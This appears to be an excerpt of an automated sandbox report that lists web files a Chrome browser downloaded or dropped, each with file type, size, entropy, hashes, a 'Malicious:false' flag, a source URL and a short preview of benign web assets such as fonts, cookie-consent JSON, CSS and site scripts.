                                                                                                                                                                                                                                                                                Preview:/*!.. * Font Awesome 4.6.3 by @davegandy - http://fontawesome.io - @fontawesome.. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License).. */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.6.3');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.6.3') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.6.3') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.6.3') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.6.3') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.6.3#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):48047
                                                                                                                                                                                                                                                                                Entropy (8bit):5.536527173922723
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:s7+VyDUAE4gZSPfu2YiHpaEBlzZK7HHxP9F:YU/4vPBdZK7nxVF
                                                                                                                                                                                                                                                                                MD5:FF47913C7516655FD4513E25A6983CEA
                                                                                                                                                                                                                                                                                SHA1:252D583FEF554D7FD4450567E55E9179B4D437D5
                                                                                                                                                                                                                                                                                SHA-256:6716207D8AF64D06BE048AB0B7FD9C4E723B8BB6FDB5CEABADA90866127FAE0C
                                                                                                                                                                                                                                                                                SHA-512:FD7BCCADCE06AF7BDE0D345E623C4B25222B45779E77F435CB62A9A18EE7BC79A6317126C828CDC94D2B9E6DDC2F5066DE20C6DC55B0BD157A44490A0FA0324D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://cdn.cookielaw.org/scripttemplates/6.14.0/assets/v2/otPcPanel.json
                                                                                                                                                                                                                                                                                Preview:. {. "name": "otPcPanel",. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY1BhbmVsIG90LWhpZGUgb3QtZmFkZS1pbiIgcm9sZT0iZGlhbG9nIiBhcmlhLWxhYmVsbGVkYnk9Im90LXBjLXRpdGxlIiBhcmlhLW1vZGFsPSJ0cnVlIj48IS0tIFBDIEhlYWRlciAtLT48ZGl2IGNsYXNzPSJvdC1wYy1oZWFkZXIiPjxkaXYgY2xhc3M9Im90LXBjLWxvZ28iIHJvbGU9ImltZyIgYXJpYS1sYWJlbD0iQ29tcGFueSBMb2dvIj48L2Rpdj48YnV0dG9uIGlkPSJjbG9zZS1wYy1idG4taGFuZGxlciIgY2xhc3M9Im90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIj48L2J1dHRvbj48L2Rpdj48ZGl2IGlkPSJvdC1wYy1jb250ZW50IiBjbGFzcz0ib3QtcGMtc2Nyb2xsYmFyIj48aDMgaWQ9Im90LXBjLXRpdGxlIj5Zb3VyIFByaXZhY3k8L2gzPjxkaXYgaWQ9Im90LXBjLWRlc2MiPjwvZGl2PjxidXR0b24gaWQ9ImFjY2VwdC1yZWNvbW1lbmRlZC1idG4taGFuZGxlciI+QWNjZXB0IEFsbDwvYnV0dG9uPjxzZWN0aW9uIGNsYXNzPSJvdC1zZGstcm93IG90LWNhdC1ncnAiPjxoMyBpZD0ib3QtY2F0ZWdvcnktdGl0bGUiPk1hbmFnZSBDb29raWUgUHJlZmVyZW5jZXM8L2gzPjxkaXYgY2xhc3M9Im90LXBsaS1oZHIiPjxzcGFuIGNsYXNzPSJvdC1saS10aXRsZSI+Q29uc2VudDwvc3Bhbj4gPHNwYW4gY2xhc3M9Im90LWxpLXRpdGxlIj5MZWdpdC4gSW50ZXJ
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, was "main.97c41ef3.js", last modified: Fri Aug 23 15:57:59 2024, from Unix, original size modulo 2^32 83598
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):27512
                                                                                                                                                                                                                                                                                Entropy (8bit):7.993187350119009
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:768:CsfAgqyshviKsrws/XBA/GaFemZwlZwwjBBJKaduJDp:jogqyshv/srwgoGaFN23jP4wiN
                                                                                                                                                                                                                                                                                MD5:0304D337D72A7B17907261BF86E2F221
                                                                                                                                                                                                                                                                                SHA1:D56F37B6686036EE3945D877BAF2849245073FCE
                                                                                                                                                                                                                                                                                SHA-256:F8501D2AAB7B556B8D8A56E8F7C6E9E21D01204249AC6D43470015AA86E2A5A7
                                                                                                                                                                                                                                                                                SHA-512:6D15FC21EFD7CB6BDD2924CB9C16E1B8ABF070AFBA1C63B7FAF998A1CB7ACB3A0CAD5F52EC27EE8763328669F40AD50CA32D62A2E94AF4073218C5DC4B79FFA3
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.......f..main.97c41ef3.js..\.o...*...b%...8.,.h{3`.[;,.... Pl:..Py..47.>.;..%..4....D......?.C.`Y.HRn3.p.g..>l.....B5.i.D.q;;...)^.$..:<.]..&.D.>l...G.y.^.|X......7kz...M....pN3....2./..d..%.l>_...b.`.._..e.^v{`..fY|.f!..b"d[..z.A.<X.Wo/..*.oX...__..~_....Td...._..]#..u.]../.X3kK......<.R.(..8....E...Nl`.{..D..,.<..S+.#XTO........."2ZB.g,....zM......(s-h....v...s.c q..5K9Y..-........2.\....f;.L.B.r3BJ..1d.o,..I.c.a1..T..$..6ly....w....r9..6.z...M....6\...;.y..._@.7.....S.'[.. ..........lz.;.....O....#......J..._...._..................|4>.M.G.......q0.V./..`.R.Xe.]....o1.b'Y..f..au.E.....Y...._..U-L..H........J...Br..j>...V............((A.{UY..}`....U....".s....t@.W$P.-..K...ZiVf#...Z.v.`..4..=.......B~...2.......L.\.'.@...].pw.zq..^..(.'..3.........4)L.,....<-.UT^.).XD.x...e`ML..O..&T..r.......{.~.......-Q.!s...2g..20-D.F.L.Xn.].Q...f..RJ.ZI.lN.m......~u..v.7%.#....m.Pn.v$4....v..M........>gT...0....Y%.).6s;+......vA.v.d.Z...p...C....x..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (41930)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):45833
                                                                                                                                                                                                                                                                                Entropy (8bit):5.08449503679837
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:WYpA67K4HmjEjsjJKWByL5UeMVZE/1XSDSPWTrAjQfSfQjXslVMazE:64rEJKWUNtwZ61GSOTrA8fnLN
                                                                                                                                                                                                                                                                                MD5:239674CFE29903CEFA45DB4F3C6F610A
                                                                                                                                                                                                                                                                                SHA1:5C5D90EAB75C62916EF34EED7B86552465A4A787
                                                                                                                                                                                                                                                                                SHA-256:93D8973874C2ECA691E78D2D35EA93B91884936AA405E5E30275ABD620919934
                                                                                                                                                                                                                                                                                SHA-512:82CCB0456EAF134CF0AFE5B7A4B936C684084B73AEEF4667D9495742A2FEE96DDE142DB6EC40FBE3FAEDA1F4B46D8EE640A50609AC4618EC8CCACF29A4984E88
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://assets.squarespace.com/universal/scripts-compressed/extract-css-runtime-bee09188f1fd427a5f1a-min.en-US.js
                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var m={},u={};function c(e){var t=u[e];if(t!==void 0)return t.exports;var a=u[e]={id:e,loaded:!1,exports:{}};return m[e].call(a.exports,a,a.exports,c),a.loaded=!0,a.exports}c.m=m,c.amdO={},(()=>{var e=[];c.O=(t,a,n,s)=>{if(a){s=s||0;for(var f=e.length;f>0&&e[f-1][2]>s;f--)e[f]=e[f-1];e[f]=[a,n,s];return}for(var d=1/0,f=0;f<e.length;f++){for(var[a,n,s]=e[f],i=!0,b=0;b<a.length;b++)(s&!1||d>=s)&&Object.keys(c.O).every(p=>c.O[p](a[b]))?a.splice(b--,1):(i=!1,s<d&&(d=s));if(i){e.splice(f--,1);var r=n();r!==void 0&&(t=r)}}return t}})(),c.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return c.d(t,{a:t}),t},(()=>{var e=Object.getPrototypeOf?a=>Object.getPrototypeOf(a):a=>a.__proto__,t;c.t=function(a,n){if(n&1&&(a=this(a)),n&8||typeof a=="object"&&a&&(n&4&&a.__esModule||n&16&&typeof a.then=="function"))return a;var s=Object.create(null);c.r(s);var f={};t=t||[null,e({}),e([]),e(e)];for(var d=n&2&&a;typeof d=="object"&&!~t.indexOf(d);d=e(d))Object.getOwnPropertyNames(d).forEa
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (43878), with NEL line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):117609
                                                                                                                                                                                                                                                                                Entropy (8bit):5.452021285934095
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:bocmEAoU4k8rNnI/JrB5DCbFN+srq7Tgk09F/yUblX8Q:YoUWNI/J3QqSLL
                                                                                                                                                                                                                                                                                MD5:93A2AEA230D421D550375C528B22583E
                                                                                                                                                                                                                                                                                SHA1:E8D88B00DB1C30510928A7C6618F0F7CFFA9B4C2
                                                                                                                                                                                                                                                                                SHA-256:54E832663426C696B1F603379026E5E15720E8C812BBBC60D63AA2AD8A479F75
                                                                                                                                                                                                                                                                                SHA-512:2BA5180B32FCD62B7A430E75C8CD8022076563299F055AD99B836AFBAEB39D205D825B2848E0686F7E136502EAAE91B39B4659D6C1F6A0895C16FA5515494EED
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://assets.squarespace.com/@sqs/polyfiller/1.6/modern.js
                                                                                                                                                                                                                                                                                Preview:(()=>{var t,r={481:(t,r,e)=>{var n=e(8807),o=e(8427),i=TypeError;t.exports=function(t){if(n(t))return t;throw i(o(t)+" is not a function")}},2420:(t,r,e)=>{var n=e(1758),o=e(8427),i=TypeError;t.exports=function(t){if(n(t))return t;throw i(o(t)+" is not a constructor")}},5946:(t,r,e)=>{var n=e(8807),o=String,i=TypeError;t.exports=function(t){if("object"==typeof t||n(t))return t;throw i("Can't set "+o(t)+" as a prototype")}},3288:(t,r,e)=>{var n=e(6982),o=e(6042),i=e(189).f,a=n("unscopables"),s=Array.prototype;null==s[a]&&i(s,a,{configurable:!0,value:o(null)}),t.exports=function(t){s[a][t]=!0}},5158:(t,r,e)=>{"use strict";var n=e(3100).charAt;t.exports=function(t,r,e){return r+(e?n(t,r).length:1)}},5712:(t,r,e)=>{var n=e(3521),o=TypeError;t.exports=function(t,r){if(n(r,t))return t;throw o("Incorrect invocation")}},1843:(t,r,e)=>{var n=e(1188),o=String,i=TypeError;t.exports=function(t){if(n(t))return t;throw i(o(t)+" is not an object")}},7603:t=>{t.exports="undefined"!=typeof ArrayBuffer&
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (43269), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):43269
                                                                                                                                                                                                                                                                                Entropy (8bit):4.945857284560572
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:p6+6zanpxanpJafXZafX4uHuM7+zb9pAb1kX7OKXpDwuFtFVWzemjXZOnEnNSded:p6+6zanpxanpUE4uHu0ER/Wzjfn
                                                                                                                                                                                                                                                                                MD5:3F4D7E756EC9B4609665DA772B9CEF98
                                                                                                                                                                                                                                                                                SHA1:C7BC79EAC7F9BAE5A979B810F8C62B9F3FB0DE5A
                                                                                                                                                                                                                                                                                SHA-256:8F5500BAB5FDB15E1FA70B4C5E8BAE7D20FED96DD8C5AE3615319922406DA9B2
                                                                                                                                                                                                                                                                                SHA-512:EF87C2F6A0F521B5B62B8981010ACAD6FCE312D8C0E22B5F7ADAFF1D8A919DAF9803280D2987FA0897D4AA9D38E61CF0C54E7F8DDC006AF080FFD555CB58E9CA
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://ruletridominium.web.app/appboy.min.css
                                                                                                                                                                                                                                                                                Preview:@-webkit-keyframes animSlideIn{0%{-webkit-transform:matrix3d(1,0,0,0,0,1,0,0,0,0,1,0,500,0,0,1);transform:matrix3d(1,0,0,0,0,1,0,0,0,0,1,0,500,0,0,1)}1.3%{-webkit-transform:matrix3d(1.207,0,0,0,0,1,0,0,0,0,1,0,395.034,0,0,1);transform:matrix3d(1.207,0,0,0,0,1,0,0,0,0,1,0,395.034,0,0,1)}2.55%{-webkit-transform:matrix3d(1.254,0,0,0,0,1,0,0,0,0,1,0,304.663,0,0,1);transform:matrix3d(1.254,0,0,0,0,1,0,0,0,0,1,0,304.663,0,0,1)}4.1%{-webkit-transform:matrix3d(1.216,0,0,0,0,1,0,0,0,0,1,0,209.854,0,0,1);transform:matrix3d(1.216,0,0,0,0,1,0,0,0,0,1,0,209.854,0,0,1)}5.71%{-webkit-transform:matrix3d(1.146,0,0,0,0,1,0,0,0,0,1,0,132.66,0,0,1);transform:matrix3d(1.146,0,0,0,0,1,0,0,0,0,1,0,132.66,0,0,1)}8.11%{-webkit-transform:matrix3d(1.059,0,0,0,0,1,0,0,0,0,1,0,52.745,0,0,1);transform:matrix3d(1.059,0,0,0,0,1,0,0,0,0,1,0,52.745,0,0,1)}8.81%{-webkit-transform:matrix3d(1.041,0,0,0,0,1,0,0,0,0,1,0,36.4,0,0,1);transform:matrix3d(1.041,0,0,0,0,1,0,0,0,0,1,0,36.4,0,0,1)}11.96%{-webkit-transform:matrix3d(
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                                                                                Entropy (8bit):2.9302005337813077
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:CUHaaatrllH5:aB
                                                                                                                                                                                                                                                                                MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                                                                                                                                                                                                                                                                                SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                                                                                                                                                                                                                                                                                SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                                                                                                                                                                                                                                                                                SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://p.typekit.net/p.gif?s=2&k=646866_65ddde819292aa47ed2c6d1d&ht=tk&h=www.spark.net&f=34661.34669.34662.34670&a=646866&js=1.21.0&app=typekit&e=js&_=1728225763583
                                                                                                                                                                                                                                                                                Preview:GIF89a.............,..............;
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):9585
                                                                                                                                                                                                                                                                                Entropy (8bit):5.414844715176509
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:kcR6M4H08DRXzBIHi3ux0i/DtwfJpYtOJYw/c3ODM4xRw+/p5Uf1CEdVf0P/qbgn:kc/sVi1aawc0
                                                                                                                                                                                                                                                                                MD5:8355E247DDC36EA97C187FEF0216D909
                                                                                                                                                                                                                                                                                SHA1:9DE2A25E64D0499F8B2632FED909C7C6F65EEE55
                                                                                                                                                                                                                                                                                SHA-256:ACD83F5FB8B117401003F7311747B0CF18EC7D55551CE776FE65A3869FC06A93
                                                                                                                                                                                                                                                                                SHA-512:395947A03F6EFB7E4F65F91D4738EC18B120BF122489C29CC4186FE2BB4A19E9E35D369D02FFC3C210CFCEABCB8DA8EF44A28659557CCEDA30123E000428D17C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://cdn.cookielaw.org/scripttemplates/6.14.0/assets/otFloatingRoundedCorner.json
                                                                                                                                                                                                                                                                                Preview:. {. "name": "otFloatingRoundedCorner",. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxvYXRpbmdSb3VuZGVkQ29ybmVyIj48ZGl2IGNsYXNzPSJvdC1zZGstY29udGFpbmVyIiByb2xlPSJkaWFsb2ciIGFyaWEtZGVzY3JpYmVkYnk9Im9uZXRydXN0LXBvbGljeS10ZXh0Ij48ZGl2IGNsYXNzPSJvdC1zZGstcm93Ij48ZGl2IGlkPSJvbmV0cnVzdC1ncm91cC1jb250YWluZXIiIGNsYXNzPSJvdC1zZGstdHdlbHZlIG90LXNkay1jb2x1bW5zIj48ZGl2IGlkPSJvbmV0cnVzdC1wb2xpY3kiPjxkaXYgY2xhc3M9ImJhbm5lci1oZWFkZXIiPjxkaXYgY2xhc3M9ImJhbm5lcl9sb2dvIj48L2Rpdj48L2Rpdj48aDMgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGhpcyBzaXRlIHVzZXMgY29va2llczwvaDM+PHAgaWQ9Im9uZXRydXN0LXBvbGljeS10ZXh0Ij5XZSB1c2UgY29va2llcyB0byBpbXByb3ZlIHlvdXIgZXhwZXJpZW5jZSwgdG8gcmVtZW1iZXIgbG9nLWluIGRldGFpbHMsIHByb3ZpZGUgc2VjdXJlIGxvZy1sb2dpbiwgY29sbGVjdCwgdG8gb3B0aW1pemUgc2l0ZSBmdW5jdGlvbmFsaXR5LCBhbmQgZGVsaXZlciBjb250ZW50IHRhaWxvcmVkIHRvIHlvdXIgaW50ZXJlc3QuIDxhIGhyZWY9IiMiPkxlYXJuIE1vcmU8L2E+PC9wPjxkaXYgY2xhc3M9Im90LWRwZC1jb250YWluZXIiPjxoMyBjbGFzcz0ib3QtZHBkL
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):43313
                                                                                                                                                                                                                                                                                Entropy (8bit):5.286512703394345
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:C4dDr5VbD+4g2BK67FTSI5RryV77ECGCZ8ZfLEYWnU3r1DSMFLtKCB:CgC4VHo8LCG2gYYv1Dl7B
                                                                                                                                                                                                                                                                                MD5:3AB59DB9933DD06BC3EA839CED81CDE3
                                                                                                                                                                                                                                                                                SHA1:04E00C1115825DB6FBCD8516058EABFCE405A07C
                                                                                                                                                                                                                                                                                SHA-256:0C25771B9E45410D45B0241E7CFC4B3A3215C80A106DE805C5F34B408D6A32F0
                                                                                                                                                                                                                                                                                SHA-512:D4A61E03AD13855EBF392B6FC5345C8B00E5C3F2EED8A504ACAA0FBCA12961949CD2AF9E154D623BE6936191AF0837D81EAAD231D5DF139E3B6552859BDBBB14
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://cdn.cookielaw.org/consent/0232e281-a585-4e05-8d99-2fec39bf53fe/433e385e-3ee9-4687-8aec-4e957b0cb255/en.json
                                                                                                                                                                                                                                                                                Preview:{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"0232e281-a585-4e05-8d99-2fec39bf53fe","MainText":"Privacy Preference Center","MainInfoText":"When you visit any website, it may store or retrieve information on your browser, mostly in the form of cookies. This information might be about you, your preferences or your device and is mostly used to make the site work as you expect it to. The information does not usually directly identify you, but it can give you a more personalized web experience. Because we respect your right to privacy, you can choose not to allow some types of cookies. Click on the different category headings to find out more and change our default settings. However, blocking some types of cookies may impact your experience of the site and the services we are able to offer.","AboutText":"More information","AboutCookiesText":"Your Privacy","ConfirmText":"Allow All","AllowAl
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65509)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):72704
                                                                                                                                                                                                                                                                                Entropy (8bit):5.38426970422447
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:+Fb2Ih8RSBpBHYIZkb3A2FCKdt3dU7/1tQ84k2c7FNBA1sVxOzT0W:+Fb2XYCkytuT1m8jFu4Oz9
                                                                                                                                                                                                                                                                                MD5:953318B6112455DA3B1BE1098643DA60
                                                                                                                                                                                                                                                                                SHA1:461028FB6BA6027C132260B4134F27DB8AF97EC8
                                                                                                                                                                                                                                                                                SHA-256:B8807A9D7CE255DA8E64EEB076B9962122A8A57A5B73FC70F430909A29CFAFEE
                                                                                                                                                                                                                                                                                SHA-512:303A5A98D5E1145B70E5C5CD46D6DC4CC9325183E7F8533A0B8547EA450D88EE8E165944F502D0C717EA3AB1591B29E31163062F74020D293321F9C15B5B5AC6
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/*! 20241006-3-RELEASE */..function _typeof(t){"@babel/helpers - typeof";return(_typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}!function(t){var e='TFASC';e.indexOf("{jsScope}")>-1&&(e="TRC"),t[e]||(t[e]={})}(window),function(t,e){t.TRC=t.TRC||{};var n=function t(){return!0},r=function n(r,i,o,a){var s=r+"/"+encodeURIComponent(o||t.TRC.publisherId)+"/log/3"+"/"+i;return a&&(s+="?"+e.TRCLogger.formatParams(a)),s},i=function e(r,i,a,s){var c,u=new(t.XDomainRequest||t.XMLHttpRequest);return u.open(r,i),u.onload="function"==typeof s?s:n,u.onerror=n,u.ontimeout=n,u.onprogress=n,u.withCredentials=!0,a&&o(u,a),u},o=function t(e,n){for(var r in n)n.hasOwnProperty(r)&&e.setRequestHeader(r,n[r])};t.TRC.TRCLogger=e.TRCLogger={post:function n(o,a,s,c,u,l){var f=r(o,a,c,u),d=i("POST",f);l&&"function"==typeof t.navigator.sendBeacon?t.na
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), CFF, length 26960, version 1.0
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):26960
                                                                                                                                                                                                                                                                                Entropy (8bit):7.991235520161598
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:768:78fslGuXPyRz39M7/09aJwbB1vkZj79TWX+xOXOFxCE3yt:Yfsk3RzX0JwnsZJWYOeSV
                                                                                                                                                                                                                                                                                MD5:C5A6052772C9E16265D14B7B2885316B
                                                                                                                                                                                                                                                                                SHA1:763E3952E096946166E920E1FE4B8872ADBCFBEC
                                                                                                                                                                                                                                                                                SHA-256:C3F4F496752BC872D3930AA25A495C4E6B5A8BE074FFB3C269A8C81C477A4752
                                                                                                                                                                                                                                                                                SHA-512:887402276A6CB1C40F3E8DC3C42836791A7A925DA1DDEA5E7602E4EB0E213103B9FE0C30BC6E88750935B1F3ED3FFBF16E0EDF8B25780B9A352CD3F29BCEBB81
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://use.typekit.net/af/272149/00000000000000007735adb1/30/l?subset_id=2&fvd=n3&v=3
                                                                                                                                                                                                                                                                                Preview:wOF2OTTO..iP.......X..h............................?DYNA.j..<?GDYN.Y...:.`..N.6.$..L....:. .k...(.8..t..($....I=......MU..../....?...?B..y/..6m2.o$...+q...[..03...u..j.wFl(`.XQ.....t.ai..`-.."V..V.....E......WQ..........w@A.*..nw.v.[.....y..&.w....2.%qf,.a.{K...{..A;`G...j.T+..!.X..z.?a...o..1.o\V..@...f.*1!>T..._.u....[..}.C}.h....v.k..0~d....v`...1..F!*"....<.5/k.?...?.....j.....\..(....nD.&&...`.G1.......g......#..E...<x..{....D..\.....J.R.V.T...-....O......-.#.........2.O..|..4....,N..b...[.,e.8....b...&..B........._.jW.....e;..@.\t.RT).4../9.W..Z...Y...V.Z.j...T.U<..(.%W..e...).....EW..M....Ey..S..n3...G...&..*.B.,%...2. I`9..C.~z3%...,.N.*e........2.o.v..xV.@H.._P.. .....>-...j''.i.-.<.M\....?z....8......w.p....H.....p...)...Y.......h...a$..i0...jh...<\...-..y8..[.Z....?......f.tm.....\k....n9:...$#...0.16;.Y{..kM\.-.S..5.[Y...!.....2L.E+7d8Y....J.n..F.X..?..@0.V.......8B .A0.@(.A<$@>4@#.C....p....1EL......."R.tQ$JE..+OJ.i.-....n.]zHOY"Ke+......
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):371
                                                                                                                                                                                                                                                                                Entropy (8bit):4.600540137157355
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:2LGaUImyCp0GlYM1wBJPyQK5DrIt6xfeGYqX3ofWLGJw47Jsr4z+LAltEsVsVsVo:2ffmyCkMwykgIaoO4nsrqH9yyyv
                                                                                                                                                                                                                                                                                MD5:97CF0FE353C517CEA6CB3E1F2E7EDFC9
                                                                                                                                                                                                                                                                                SHA1:58D8EB24BFD5CA347B6A0A72894E6C8B6EAE198F
                                                                                                                                                                                                                                                                                SHA-256:0E0C8CEDB72A7E5A3080203509132486E267E5D1B0C5C6EAE78AC16F7928FF01
                                                                                                                                                                                                                                                                                SHA-512:F3D33FE997DC8FDFF9B122C208321F1DB35B2A6C2650C8EAC119A2A20FAE74874691340C3419283AE0914E5405D51E40BF787469B3A7A2B66A81A68B6E2009EB
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(function(w,d,c,k,a,b,t,e) {.. var cs = d.currentScript;.. if (cs) {.. var uo = cs.getAttribute('data-ueto');.. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {.. w[uo].setUserSignals({'co': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});.. }.. }..})(window, document, 'us', false, false, false, false, false);..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (50522), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):50523
                                                                                                                                                                                                                                                                                Entropy (8bit):5.297134171375771
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:IaOFhhR9OIFhOjfRysgLzQyVwhYyDMsWxKQ:IaOFnR2DRszQekTWUQ
                                                                                                                                                                                                                                                                                MD5:14272A6CDF99BDC079B8EC8097889F49
                                                                                                                                                                                                                                                                                SHA1:2343F9F1D29F3B034F3B8FFB7A92BFFD98A88450
                                                                                                                                                                                                                                                                                SHA-256:73AAA4E6BFC1DBED5F3F934710D1ADA545F4068742235E59D0CB74F0EAF0A3C4
                                                                                                                                                                                                                                                                                SHA-512:BD83B900ACBFB123F485F46DE1692710B7C77DE90739CA3CFAB7A58CF3B71FCD9D97FCCEC6762528886C57A41F101574209F65B2BEF745613F0BCB7D196200A5
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
